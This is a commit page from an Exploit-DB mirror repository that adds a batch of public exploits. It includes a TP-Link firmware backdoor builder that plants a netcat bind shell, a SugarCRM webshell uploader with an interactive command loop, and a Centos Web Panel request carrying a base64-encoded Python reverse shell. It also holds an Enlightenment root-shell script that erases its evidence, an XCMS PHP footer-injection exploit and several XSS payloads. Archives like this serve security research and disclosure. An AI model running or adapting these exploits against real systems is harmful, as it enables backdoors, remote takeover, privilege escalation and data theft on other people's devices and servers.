bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-04-02

Browse source 
23 changes to exploits/shellcodes/ghdb

ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)

Hughes Satellite Router HX200 v8.3.1.14 -  Remote File Inclusion

Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)

TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)

GeoVision Camera GV-ADR2701 - Authentication Bypass

AD Manager Plus 7122 - Remote Code Execution (RCE)

Enlightenment v0.25.3 - Privilege escalation

Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)

Apache 2.4.x - Buffer Overflow

perfSONAR v4.4.5 - Partial Blind CSRF

SugarCRM 12.2.0 - Remote Code Execution (RCE)

XCMS v1.83 - Remote Command Execution (RCE)

Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)

GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)

AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)

NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit

Splashtop 8.71.12001.0 - Unquoted Service Path

Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)

FlipRotation v1.0 decoder - Shellcode (146 bytes)

Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes)

macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode
This commit is contained in:
Exploit-DB 2023-04-02 00:16:21 +00:00
parent 9b56e8731e
commit 3de26153c8
23 changed files with 2847 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
exploits/aspx/webapps/51200.txt Normal file
View file

@ -0,0 +1,19 @@
# Exploit Title: ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)
# Date: 12/09/2022
# Exploit Author: Rob, CTRL Group
# Vendor Homepage: marigroup.com
# Version: V3.3.3 and under
# Tested on: Windows IIS all versions
# CVE : CVE-2022-35543
“Stored Cross-Site Scripting” Vulnerability within the Elsi Smart Floor software. This vulnerability does require authentication however, once the payload is stored, any user visiting the portal will trigger the alert.
Login to the appplication
Browse to "Settings" tab and tehn " Wards". Create a new word with the following payload at the ward name:
<script>alert(document.cookie)</script>
Any user browsing the application will trigger the payload.

71
exploits/hardware/remote/51190.txt Normal file
View file

@ -0,0 +1,71 @@
Exploit Title: Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion
Vendor: Hughes Network Systems, LLC
Product web page: https://www.hughes.com
Affected version: HX200 v8.3.1.14
HX90 v6.11.0.5
HX50L v6.10.0.18
HN9460 v8.2.0.48
HN7000S v6.9.0.37
Summary: The HX200 is a high-performance satellite router designed to
provide carrier-grade IP services using dynamically assigned high-bandwidth
satellite IP connectivity. The HX200 satellite router provides flexible
Quality of Service (QoS) features that can be tailored to the network
applications at each individual remote router, such as Adaptive Constant
Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter
bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.
With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,
and DNS Server/Relay functionality, together with a high-performance
satellite modem, the HX200 is a full-featured IP Router with an integrated
high-performance satellite router. The HX200 enables high- performance
IP connectivity for a variety of applications including cellular backhaul,
MPLS extension services, virtual leased line, mobile services and other
high-bandwidth solutions.
Desc: The router contains a cross-frame scripting via remote file inclusion
vulnerability that may potentially be exploited by malicious users to compromise
an affected system. This vulnerability may allow an unauthenticated malicious
user to misuse frames, include JS/HTML code and steal sensitive information
from legitimate users of the application.
Tested on: WindWeb/1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5743
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php
23.12.2022
--
snippet:///XFSRFI
//
// Hughes Satellite Router RFI/XFS PoC Exploit
// by lqwrm 2022
//
//URL http://TARGET/fs/dynaform/speedtest.html
//Reload target
//window.location.reload()
console.log("Loading Broadband Satellite Browsing Test");
//Add cross-frame file include (http only)
AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");
console.log("Calling StartTest()");
StartTest()
//console.log("Calling DoTest()");
//DoTest()
//Unload weapon
//document.getElementById("URLList").remove();

199
exploits/hardware/remote/51192.py Executable file
View file

@ -0,0 +1,199 @@
# !/usr/bin/python3
# Exploit Title: TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Tobias Müller
# Date: 2022-12-01
# Version: TL-WR902AC(EU)_V3_0.9.1 Build 220329
# Vendor Homepage: https://www.tp-link.com/
# Tested On: TP-Link TL-WR902AC
# Vulnerability Description: Remote Code Execution via importing malicious firmware file
# CVE: CVE-2022-48194
# Technical Details: https://github.com/otsmr/internet-of-vulnerable-things
TARGET_HOST = "192.168.0.1"
ADMIN_PASSWORD = "admin"
TP_LINK_FIRMWARE_DOWNLOAD = "https://static.tp-link.com/upload/firmware/2022/202208/20220803/TL-WR902AC(EU)_V3_220329.zip"
import requests
import os
import glob
import subprocess
import base64, os, hashlib
from Crypto.Cipher import AES, PKCS1_v1_5 # pip install pycryptodome
from Crypto.PublicKey import RSA
from Crypto.Util.Padding import pad
for program in ["binwalk", "fakeroot", "unsquashfs", "mksquashfs"]:
if "not found" in subprocess.check_output(["which", program]).decode():
print(f"[!] need {program} to run")
exit(1)
class WebClient(object):
def __init__(self, host, password):
self.host = "http://" + host
self.password = password
self.password_hash = hashlib.md5(('admin%s' % password.encode('utf-8')).encode('utf-8')).hexdigest()
self.aes_key = "7765636728821987"
self.aes_iv = "8775677306058909"
self.session = requests.Session()
crypto_data = self.cgi_basic("?8", "[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n").text
self.sign_rsa_e = int(crypto_data.split("\n")[1].split('"')[1], 16)
self.sign_rsa_n = int(crypto_data.split("\n")[2].split('"')[1], 16)
self.seq = int(crypto_data.split("\n")[3].split('"')[1])
self.jsessionid = self.get_jsessionid()
def get_jsessionid(self):
post_data = f"8\r\n[/cgi/login#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nusername=admin\r\npassword={self.password}\r\n"
self.get_encrypted_request_data(post_data, True)
return self.session.cookies["JSESSIONID"]
def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
cipher = AES.new(aes_key.encode('utf-8'), AES.MODE_CBC, iv=aes_iv.encode('utf-8'))
plaintext_padded = pad(plaintext, aes_block_size)
return cipher.encrypt(plaintext_padded)
def rsa_encrypt(self, n, e, plaintext):
public_key = RSA.construct((n, e)).publickey()
encryptor = PKCS1_v1_5.new(public_key)
block_size = int(public_key.n.bit_length() / 8) - 11
encrypted_text = ''
for i in range(0, len(plaintext), block_size):
encrypted_text += encryptor.encrypt(plaintext[i:i + block_size]).hex()
return encrypted_text
def get_encrypted_request_data(self, post_data, is_login: bool):
encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, post_data.encode('utf-8'))
encrypted_data = base64.b64encode(encrypted_data).decode()
self.seq += len(encrypted_data)
signature = f"h={self.password_hash}&s={self.seq}"
if is_login:
signature = f"key={self.aes_key}&iv={self.aes_iv}&" + signature
encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature.encode('utf-8'))
body = f"sign={encrypted_signature}\r\ndata={encrypted_data}\r\n"
return self.cgi_basic("_gdpr", body)
def cgi_basic(self, url: str, body: str):
res = self.session.post(f"{self.host}/cgi{url}", data=body, headers={
"Referer": "http://192.168.0.1/"
})
if res.status_code != 200:
print(res.text)
raise ValueError("router not reachable")
return res
def cmd(command):
print("[*] running " + command)
os.system(command)
def build_backdoor():
if os.path.isdir("./tp_tmp"):
cmd("rm -r -f ./tp_tmp")
os.mkdir("./tp_tmp")
os.chdir('./tp_tmp')
print("[*] downloading firmware")
res = requests.get(TP_LINK_FIRMWARE_DOWNLOAD)
with open("firmware.zip", "wb") as f:
f.write(res.content)
print("[*] downloading netcat")
#res = requests.get(NETCAT_PRECOMPILED_FILE)
#with open("netcat", "wb") as f:
# f.write(res.content)
if os.path.isfile("netcat"):
print("[!] netcat not found")
exit()
cmd('unzip firmware.zip')
filename = glob.glob("TL-*.bin")[0]
cmd(f"mv '{filename}' firmware.bin")
cmd('binwalk --dd=".*" firmware.bin')
cmd('fakeroot -s f.dat unsquashfs -d squashfs-root _firmware.bin.extracted/160200')
with open("./squashfs-root/etc/init.d/back", "w") as f:
f.write("""
#!/bin/sh
while true;
do
netcat -l -p 3030 -e /bin/sh
sleep 5
done
""")
cmd("chmod +x ./squashfs-root/etc/init.d/back")
with open("./squashfs-root/etc/init.d/rcS", "r+") as f:
content = f.read()
content = content.replace("cos &", "/etc/init.d/back &\ncos &")
f.write(content)
cmd("cp netcat ./squashfs-root/usr/bin/")
cmd("chmod +x ./squashfs-root/usr/bin/netcat")
cmd("fakeroot -i f.dat mksquashfs squashfs-root backdoor.squashfs -comp xz -b 262144")
size = subprocess.check_output(["file", "backdoor.squashfs"]).decode()
offset = int(size.split(" ")[9]) + 1442304
cmd("dd if=firmware.bin of=backdoor.bin bs=1 count=1442304")
cmd("dd if=backdoor.squashfs of=backdoor.bin bs=1 seek=1442304")
cmd(f"dd if=firmware.bin of=backdoor.bin bs=1 seek={offset} skip={offset}")
os.chdir('../')
cmd(f"mv ./tp_tmp/backdoor.bin .")
cmd("rm -r -f ./tp_tmp")
def upload_backdoor():
wc = WebClient(TARGET_HOST, ADMIN_PASSWORD)
print("[*] uploading backdoor")
files = {
'filename': open('backdoor.bin','rb')
}
re_upload = requests.post("http://" + TARGET_HOST + "/cgi/softup", cookies={
"JSESSIONID": wc.jsessionid
}, headers={
"Referer": "http://192.168.0.1/mainFrame.htm"
}, files=files)
if re_upload.status_code != 200 or "OK" not in re_upload.text:
print("[!] error")
exit(1)
print("[*] success!")
print("\nWait for router restart, then run:")
print("nc 192.168.0.1 3030")
build_backdoor()
upload_backdoor()

42
exploits/hardware/remote/51195.py Executable file
View file

@ -0,0 +1,42 @@
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio=
n (RCE) (Authenticated)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149
import requests
import base64
router_host =3D "http://192.168.1.1"
username =3D "admin"
password =3D "admin"
def main():
send_payload("&telnetd")
print("connect to router using: `telnet "+router_host.split("//")[1]+ "=
` using known credentials")
pass
def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
def get_cookie(header):
url =3D router_host+"/login"
params =3D {"arg":header, "_n":1}
resp=3Drequests.get(url, params=3Dparams)
=20
def send_payload(payload):
url =3D router_host+"/goform/sysTools"
headers =3D {"Authorization": "Basic {}".format(gen_header(username, pa=
ssword))}
params =3D {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK=
"}
requests.post(url, headers=3Dheaders, data=3Dparams)
if __name__ =3D=3D '__main__':
main()

72
exploits/hardware/webapps/51179.txt Normal file
View file

@ -0,0 +1,72 @@
# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass
# Device name: GV-ADR2701
# Date: 26 December , 2020
# Exploit Author: Chan Nyein Wai
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Firmware Version: V1.00_2017_12_15
# Tested on: windows 10
# Exploitation
1. Capture The Login Request with burp, Do intercept request to response
Request:
```
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0)
Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==
Content-Length: 46
Origin: http://10.10.10.10
Connection: close
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0
Cookie: isAutoStartVideo=1
{"UserName":"admin","Password":"0X]&0D]]05"}
```
2. The following is the normal response when you login to the server.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 460,
"StatusString": "PasswdError",
"Data": "null"
}
}
```
By editing the response to the following, you can successfully log in to
the web application.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 0,
"StatusString": "Succeed",
"Data": "null"
}
}
```

54
exploits/java/remote/51183.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE)
# Exploit Author: Chan Nyein Wai & Thura Moe Myint
# Vendor Homepage: https://www.manageengine.com/products/ad-manager/
# Software Link: https://www.manageengine.com/products/ad-manager/download.html
# Version: Ad Manager Plus Before 7122
# Tested on: Windows
# CVE : CVE-2021-44228
# Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md
### Description
In the summer of 2022, I have been doing security engagement on Synack
Red Team in the collaboration with my good friend (Thura Moe Myint).
At that time, Log4j was already widespread on the internet. Manage
Engine had already patched the Ad Manager Plus to prevent it from
being affected by the Log4j vulnerability. They had mentioned that
Log4j was not affected by Ad Manager Plus. However, we determined that
the Ad Manager Plus was running on our target and managed to exploit
the Log4j vulnerability.
### Exploitation
First, Lets make a login request using proxy.
Inject the following payload in the ```methodToCall``` parameter in
the ```ADSearch.cc``` request.
Then you will get the dns callback with username in your burp collabrator.
### Notes
When we initially reported this vulnerability to Synack, we only
managed to get a DNS callback and our report was marked as LDAP
injection. However, we attempted to gain full RCE on the host but were
not successful. Later, we discovered that Ad Manager Plus was running
on another target, so we tried to get full RCE on that target. We
realized that there was a firewall and an anti-virus running on the
machine, so most of our payloads wouldn't work. After spending a
considerable amount of time , we eventually managed to bypass the
firewall and anti-virus, and achieve full RCE.
### Conclusion
We had already informed Zoho about the log4j vulnerability, and even
after it was fixed, they decided to reward us with a bonus bounty for
our report.
### Mitigation
Updating to a version of Ad Manager Plus higher than 7122 should
resolve the issue.

100
exploits/linux/local/51180.txt Normal file
View file

@ -0,0 +1,100 @@
## Exploit Title: Enlightenment v0.25.3 - Privilege escalation
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## CVE ID: CVE-2022-37706
## Description:
The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.
Enlightenment_sys in Enlightenment before 0.25.3 allows local users to
gain privileges because it is setuid root,
and the system library function mishandles pathnames that begin with a
/dev/.. substring
If the attacker has access locally to some machine on which the
machine is installed Enlightenment
he can use this vulnerability to do very dangerous stuff.
## STATUS: CRITICAL Vulnerability
## Tested on:
```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```
[+] Exploit:
```bash
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"
${file} /bin/mount -o
noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),
"/dev/../tmp/;/tmp/exploit" /tmp///net
read -p "Press any key to clean the evedence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
## Proof and Exploit:
[href](https://streamable.com/zflbgg)
## Time spent
`01:00:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

39
exploits/linux/webapps/51194.txt Normal file
View file

@ -0,0 +1,39 @@
[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Author: Numan Türle
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877
Description
--------------
Bash commands can be run because double quotes are used to log incorrect entries to the system.
Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY
Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
username=root&password=toor&commit=Login
--------------
Solution
--------
Upgrade to CWP7 current version

23
exploits/multiple/webapps/51186.txt Normal file
View file

@ -0,0 +1,23 @@
Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF
Link: https://github.com/perfsonar/
Affected Versions: v4.x <= v4.4.5
Vulnerability Type: Partial Blind CSRF
Discovered by: Ryan Moore
CVE: CVE-2022-41413
Summary
A partial blind CSRF vulnerability exists in perfSONAR v4.x <= v4.4.5 within the /perfsonar-graphs/ test results page. Parameters and values can be injected/passed via the URL parameter, forcing the client to connect unknowingly in the background to other sites via transparent XMLHTTPRequests. This partial blind CSRF bypasses the built-in whitelisting function in perfSONAR.
This vulnerability was patched in perfSONAR v4.4.6.
Proof of Concept
Examples
Here are two examples of this vulnerability. For further details, review the Technical Overview section below.
Example 1:
Client browser connects to www.google.com in the background.
http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com
Example 2:
Client browser connects to arbitrary IP and port in the background, passing delete parameter to /api endpoint.
http://192.168.68.145/perfsonar-graphs/?source=8.8.8.8&dest=%26action%3Ddelete&url=http://192.168.68.113:4444/api

34
exploits/multiple/webapps/51193.py Executable file
View file

@ -0,0 +1,34 @@
# Exploit Title: Apache 2.4.x - Buffer Overflow
# Date: Jan 2 2023
# Exploit Author: Sunil Iyengar
# Vendor Homepage: https://httpd.apache.org/
# Software Link: https://archive.apache.org/dist/httpd/
# Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51
# Tested on: (Server) Kali, (Client) MacOS Monterey
# CVE : CVE-2021-44790
import requests
#Example "http(s)://<hostname>/process.lua"
url = "http(s)://<hostname>/<luafile>"
payload = "4\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n0\r\n4\r\n"
headers = {
'Content-Type': 'multipart/form-data; boundary=4'
}
#Note1: The value for boundary=4, in the above example, is arbitrary. It can be anything else like 1.
# But this has to match with the values in Payload.
#Note2: The form data as shown above returns the response as "memory allocation error: block too big".
# But one can change the payload to name=\"name\"\r\n\r\n\r\n4\r\n" and not get the error but on the lua module overflows
# 3 more bytes during memset
response = requests.request("POST", url, headers=headers, data=payload)
print(response.text)
#Response returned is
#<h3>Error!</h3>
#<pre>memory allocation error: block too big</pre>

103
exploits/php/webapps/51184.txt Normal file
View file

@ -0,0 +1,103 @@
Exploit Title: XCMS v1.83 - Remote Command Execution (RCE)
Author: Onurcan
Email: onurcanalcan@gmail.com
Site: ihteam.net
Script Download : http://www.xcms.it
Date: 26/12/2022
The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms.
Taking "home.php" for example:
<?php
//home.php
[...]
include(CSTR."footer".STR); // <- "CSTR" and "STR" are the constants previously declared. They refers to "/dati/generali" and "dtb"
?>
So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel.
So let's take a look to the bugged code.
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- so miss an exit() :-D
[...]
if(isset($_POST['salva'])){
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
}
[...]
?>
So with a simple html form we can change the footer.
Ex:
<form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post">
<input type="hidden" name="salva" value="OK" />
<textarea name="testo_0"><?php YOUR PHP CODE ?></textarea>
<input type="submit" value="Modifica" />
</form>
<script>document.editor.submit()</script>
Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials.
Trick: We can change the admin panel password by inserting this code in the footer:
<?php
$pwd = "owned"; // <- Place here your new password.
$pwd2 = md5($pwd);
unlink("dati/generali/pass.php");
$f = fopen("dati/generali/pass.php",w);
fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");
fclose($f);
?>
This code delete the old password file and then create a new one with your new password.
Fix:
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug.
[...]
if(isset($_POST['salva'])){
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
}
[...]
?>
So this is a simple exploit:
<?php
if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){
echo "
<form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\">
<input type=\"hidden\" name=\"salva\" value=\"OK\" />
<textarea name=\"testo_0\">".$_POST['code']."</textarea>
<input type=\"submit\" value=\"Modifica\" />
</form>
<script>document.editor.submit()</script>";
}else{
echo"
<pre>
XCMS <= v1.82 Remote Command Execution Vulnerability
Dork : inurl:\"mod=notizie\"
by Onurcan
Visit ihteam.net
</pre>
<form method=POST action=".$_POST['PHP_SELF'].">
<pre>
Site :
<input type=text name=site />
Code :
<textarea name=code cols=49 rows=14>Your code here</textarea>
<input type=submit value=Exploit />
<input type=hidden name=\"send\" />
</pre>
</form>";
}
?>

47
exploits/php/webapps/51187.py Executable file
View file

@ -0,0 +1,47 @@
#!/usr/bin/env python
# Exploit Title: SugarCRM 12.2.0 - Remote Code Execution (RCE)
# Exploit Author: sw33t.0day
# Vendor Homepage: https://www.sugarcrm.com
# Version: all commercial versions up to 12.2.0
# Dorks:
# https://www.google.com/search?q=site:sugarondemand.com&filter=0
# https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php
# https://www.shodan.io/search?query=http.title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com"
import base64, re, requests, sys, uuid
requests.packages.urllib3.disable_warnings()
if len(sys.argv) != 2:
sys.exit("Usage: %s [URL]" % sys.argv[0])
print "[+] Sending authentication request"
url = sys.argv[1] + "/index.php"
session = {"PHPSESSID": str(uuid.uuid4())}
params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}
requests.post(url, cookies=session, data=params, verify=False)
print "[+] Uploading PHP shell\n"
png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC"
upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtml
params = {"module": "EmailTemplates", "action": "AttachFiles"}
requests.post(url, cookies=session, data=params, files=upload, verify=False)
url = sys.argv[1] + "/cache/images/sweet.phar"
while True:
cmd = raw_input("# ")
res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False)
res = re.search("#####(.*)#####", res.text, re.DOTALL)
if res:
print res.group(1)
else:
sys.exit("\n[+] Failure!\n")

34
exploits/php/webapps/51198.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 2/1/2023
# Exploit Author: Rian Saaty
# Vendor Homepage: https://yui.github.io/yui2/
# Software Link: https://yui.github.io/yui2/
# Version: 2.8.2
# Tested on: MacOS, WindowsOS, LinuxOS
# CVE : CVE-2022-48197
The YUI2 has a lot of reflected XSS vulnerabilities in pretty much
most files. A sample of the vulnerable files along with the exploit
can be found here:
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
Twitter: @Ryan_412_

607
exploits/ruby/webapps/51181.py Executable file
View file

@ -0,0 +1,607 @@
# Exploit Title: GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-12-25
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install/
# Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3.1
# Tested on: 'gitlab/gitlab-ce:15.3.0-ce.0' Docker container (vulnerable application), 'Ubuntu 20.04.5 LTS' with 'Python 3.8.10' (script execution)
# CVE: CVE-2022-2884
# Category: WebApps
# Repository: https://github.com/m3ssap0/gitlab_rce_cve-2022-2884
# Credits: yvvdwf (https://hackerone.com/reports/1672388)
